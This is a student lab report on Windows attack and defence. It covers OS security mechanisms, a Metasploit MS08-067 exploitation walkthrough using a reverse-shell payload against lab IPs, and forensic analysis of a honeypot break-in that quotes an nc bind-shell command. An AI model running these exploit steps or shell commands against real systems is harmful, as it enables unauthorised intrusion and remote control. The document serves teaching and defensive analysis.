20199128 2019-2020-2 《网络攻防实践》第七周作业
20199128 2019-2020-2 《网络攻防实践》第七周作业
| 这个作业属于哪个课程 | 《网络攻防实践》 |
| 这个作业的要求在哪里 | 《网络攻防实践》第七周作业 |
| 这个作业在哪个具体方面帮助我实现目标 | 学习Windows操作系统安全攻防相关知识 |
| 作业正文.... | 见正文 |
| 其他参考文献 | 见参考文献 |
1.实践内容
1.Windows操作系统基本框架
- 基本结构:分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码。前者包括:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码;后者包括:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
- Windows进程和线程管理机制:进程在Windows系统中被视为可执行程序运行时的容器。进程包含虚拟内存空间描述符、系统资源对象句柄列表、安全访问令牌和执行线程。线程在Windows系统中作为指令执行的具体载体,其线程控制块TCB中包含程序执行的上下文信息等,并且共享进程的虚拟地址空间、资源列表、安全访问令牌。
- Windows内存管理机制:虚拟内存分为系统核心内存区间和用户内存区间。用户态程序无法直接访问前者。
- Windows文件管理机制:采用NTFS文件系统,可执行文件采用PE格式。
- Windows注册表管理机制:是系统全局配置、用户和应用软件配置信息的存储仓库。
- Windows网络机制:网卡硬件设备驱动程序(物理层)、NDIS库及miniport驱动程序(链路层)、TDI(传输层)、网络API DLL和TDI客户端(会话层和表示层)、网络应用程序与服务进程(应用层)。
2.Windows操作系统的安全体系结构与机制
- 引用监控器模型:系统所有主体访问客体均要以引用监控器为中介,由其进行授权访问,所有访问记录也由其生成审计日志。
- Windows安全体系结构:位于内核的SRM安全引用监控器和位于用户态的LSASS安全服务,与Winlogon/Netlogon及Eventlog等服务一起,实现了对主体用户的身份认证机制、对所有资源对象的访问控制机制,以及对访问的安全审计机制。
- Windows身份认证机制:Windows设置账户作为安全主体运行程序代码的执行环境,账户权限的根本作用是限制账户内运行程序对系统资源对象的访问。Windows支持本地身份认证和网络身份认证两种方式。
- Windows授权与访问控制机制:基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同实施,由SRM作为安全主体访问对象资源时的中介,根据设定的访问控制列表进行授权访问。
- Windows安全审计机制:系统审计策略在本地安全策略中由系统管理员定义,来确定系统对那些实践进行记录。
- 其他安全机制:Windows安全中心,IPsec加载和验证机制,EPS加密文件系统,文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制等。
3.Windows远程安全攻防技术
-
包含远程口令猜测与破解攻击、Windows网络服务攻击、Windows客户端和用户攻击。
-
针对特定目标的渗透测试攻击过程
-
漏洞扫描测试:对目标系统的扫描测试,从而发现系统中是否存在已知的安全漏洞。
-
查找漏洞的渗透代码:根据安全漏洞信息库中的索引信息,在安全社区中找到针对已经扫描出的安全漏洞的攻击代码资源。
-
实施参透测试:在找到渗透代码之后可以实施渗透攻击。但是否成功取决于代码和目标的环境是否匹配。
-
-
Metasploit渗透测试: metasploit包含利用安全漏洞的exploits模块、负责扫描和查点的auxiliary模块、负责在目标系统植入shellcode(利用软件漏洞而执行的代码)的payload模块、可以躲避检测encoders模块、对攻击负载进行填充的Nops等模块及多种接口。
-
Windows远程口令猜测与破解攻击
-
远程口令猜测:经常遭受该类攻击的网络服务SMB协议、WMI服务、TS远程桌面终端服务、MS SQL数据库服务、SharePoint等。
-
远程口令字交换通讯窃听与破解:windows在对网络用户身份进行验证的时候需要在网上交换信息,因而可以被窃听网络口令交换通信实施破解。
-
防范措施:
- 尽量关闭不必要开放的网络服务;
- 配置主机防火墙来限制某些端口的服务;
- 利用网络防火墙限制访问上述服务;
- 保持windows更新修补漏洞;
- 制定实施强口令字策略。。
-
-
windows远程服务渗透攻击:Windows默认开放的端口所提供的网络服务是攻击和恶意代码传播的主要目标。
4.Windows本地安全攻防技术
-
Windows本地提权:从受限用户权限尝试获得特权账户的攻击技术。主要通过DDL注入和破解本地程序安全漏洞。防范措施:打补丁和跟踪厂商安全警告。
-
Windows敏感信息窃取:windows系统口令字密文提取技术、windows系统口令字破解技术、用户敏感信息窃取等。防范措施:选择好口令。
-
Windows消踪灭迹:通过关闭审计功能、清理事件日志来掩盖入侵痕迹。防范措施:备份日志记录。
-
Windows远程控制与后门程序:使用命令行远程控制工具、图形化远程控制工具等在系统植入远程控制和后门程序,维持对主机的持久控制。防范措施:后门检测软件。
2.实践过程
任务一:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
攻击机kali:192.168.200.2
靶机Win2k:192.168.200.124
1.在kali终端输入msfconsole开启metasploit
2.选择针对ms08-067漏洞的渗透模块,use exploit/windows/smb/ms08_067_netapi
3.选择适用的攻击负载模块,set PAYLOAD generic/shell_reverse_tcp
4.设置渗透攻击的攻击机Ip和靶机IP,set LHOST 192.168.200.2和set RHOST 192.168.200.124
5.选择渗透攻击模块的目标操作系统平台类型,set TARGET 0
6.实施渗透攻击,exploit
7.攻击成功验证,ipconfig
任务二:取证分析实践:解码一次成功的NT系统破解攻击
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为:lab.wiretrip.net);回答下面的问题:
1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、当攻击者获得系统的访问权后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
1.wireshark打开.log文件,Statistics->HTTP->Requests
按条件筛选ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106,找到No.117数据包,发现boot.ini启动,以及Unicode编码%C0%AF
No.130和No.140中含有msadc,表明探测进行
No.149,追踪tcp流,可以看到字符串"ADM!ROX!YOUR!WORLD"和查询语句中的dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,经查询得知,这次攻击是由rain forest puppy编写的msadc(2).pl渗透代码发起的
2.对No.179进行tcp流追踪,看到攻击者键入了echo user johna2k > ftpcom
对No.229追踪tcp流,发现攻击者尝试连接ftp服务器未果
直到No.1106,方才成功连接ftp
No.1224追踪tcp流,得知攻击者键入了1.exe /c nc -l -p 6969 -e 然后执行1.exe
3.按条件筛选tcp.port == 6969,追踪tcp流,可知如下攻击者行为
4.
- 禁用用不着的 RDS 等服务。
- 防火墙封禁网络内部服务器发起的连接。
- 为 web server 在单独的文件卷上设置虚拟根目录。
- 使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能。
- 使用 IIS Lockdown 和 URLScan 等工具加强 web server。
5.攻击者发现并留下了称赞
任务三:团队对抗实践:Windows系统远程渗透攻击和分析
攻击方使用metaploit选择漏洞进行渗透攻击,获得控制权。
防守方使用wireshark监听获得网络攻击的数据包,结合分析过程,获得攻击者IP地址、目的IP地址和端口、攻击发起时间、攻击利用漏洞、攻击使用的shellcode,以及本地执行的命令输入信息。
攻击过程如任务一,如下为wireshark抓包
3.学习中遇到的问题及解决
- 问题1:攻击MS08-067不成功
- 问题1解决方案:切换负载为generic/shell_reverse_tcp
4.实践总结
在分析日志上有很大不足。
